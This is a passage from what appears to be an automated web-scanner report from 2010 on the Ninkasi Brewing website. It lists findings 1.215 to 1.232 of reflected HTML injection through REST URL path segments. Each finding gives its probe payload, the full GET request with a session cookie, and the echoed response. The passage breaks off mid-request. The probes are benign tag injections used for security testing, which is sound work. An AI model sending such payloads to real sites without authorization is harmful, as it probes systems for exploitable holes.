This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta4b52"><a>dca3b514689/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta4b52"><a>dca3b514689_page" class="contenta4b52">
...[SNIP]...

1.215. http://www.ninkasibrewing.com/content/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5f9"><a>6ec3d9ffd59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentbb5f9"><a>6ec3d9ffd59/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentbb5f9"><a>6ec3d9ffd59_page" class="contentbb5f9">
...[SNIP]...

1.216. http://www.ninkasibrewing.com/content/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f696"><a>14eab4f7f64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6f696"><a>14eab4f7f64/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content6f696"><a>14eab4f7f64_page" class="content6f696">
...[SNIP]...

1.217. http://www.ninkasibrewing.com/content/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a612"><a>155fb3b9f51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content3a612"><a>155fb3b9f51/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content3a612"><a>155fb3b9f51_page" class="content3a612">
...[SNIP]...

1.218. http://www.ninkasibrewing.com/content/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf9b"><a>e851ee84c8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentedf9b"><a>e851ee84c8f/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentedf9b"><a>e851ee84c8f_page" class="contentedf9b">
...[SNIP]...

1.219. http://www.ninkasibrewing.com/content/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f19e"><a>5dbf816ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6f19e"><a>5dbf816ffe/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content6f19e"><a>5dbf816ffe_page" class="content6f19e">
...[SNIP]...

1.220. http://www.ninkasibrewing.com/content/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1074f"><a>3bd48f0635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1074f"><a>3bd48f0635/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1074f"><a>3bd48f0635_page" class="content1074f">
...[SNIP]...

1.221. http://www.ninkasibrewing.com/content/css/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f27"><a>d2ed1bcbe0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content39f27"><a>d2ed1bcbe0a/css/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content39f27"><a>d2ed1bcbe0a_page" class="content39f27">
...[SNIP]...

1.222. http://www.ninkasibrewing.com/content/css/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de265"><a>99351a372e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentde265"><a>99351a372e/css/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentde265"><a>99351a372e_page" class="contentde265">
...[SNIP]...

1.223. http://www.ninkasibrewing.com/content/css/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84a9"><a>f8f239e2cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta84a9"><a>f8f239e2cf0/css/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta84a9"><a>f8f239e2cf0_page" class="contenta84a9">
...[SNIP]...

1.224. http://www.ninkasibrewing.com/content/css/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6505"><a>a690865482b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentd6505"><a>a690865482b/css/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentd6505"><a>a690865482b_page" class="contentd6505">
...[SNIP]...

1.225. http://www.ninkasibrewing.com/content/css/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db76d"><a>d3d2af91b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentdb76d"><a>d3d2af91b6b/css/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentdb76d"><a>d3d2af91b6b_page" class="contentdb76d">
...[SNIP]...

1.226. http://www.ninkasibrewing.com/content/css/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e8c"><a>4b2c3c0e6c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentb1e8c"><a>4b2c3c0e6c7/css/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentb1e8c"><a>4b2c3c0e6c7_page" class="contentb1e8c">
...[SNIP]...

1.227. http://www.ninkasibrewing.com/content/css/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/css/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f196b"><a>845524f273a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentf196b"><a>845524f273a/css/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentf196b"><a>845524f273a_page" class="contentf196b">
...[SNIP]...

1.228. http://www.ninkasibrewing.com/content/img/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45663"><a>8b95a448cfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content45663"><a>8b95a448cfa/img/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content45663"><a>8b95a448cfa_page" class="content45663">
...[SNIP]...

1.229. http://www.ninkasibrewing.com/content/img/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1441f"><a>7fd0b4d00b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1441f"><a>7fd0b4d00b1/img/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1441f"><a>7fd0b4d00b1_page" class="content1441f">
...[SNIP]...

1.230. http://www.ninkasibrewing.com/content/img/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718f2"><a>c3b71b0f726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content718f2"><a>c3b71b0f726/img/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content718f2"><a>c3b71b0f726_page" class="content718f2">
...[SNIP]...

1.231. http://www.ninkasibrewing.com/content/img/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5a8"><a>50fc2122c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentbe5a8"><a>50fc2122c0/img/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentbe5a8"><a>50fc2122c0_page" class="contentbe5a8">
...[SNIP]...

1.232. http://www.ninkasibrewing.com/content/img/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58e6"><a>673bbcd9798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentd58e6"><a>673bbcd9798/img/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
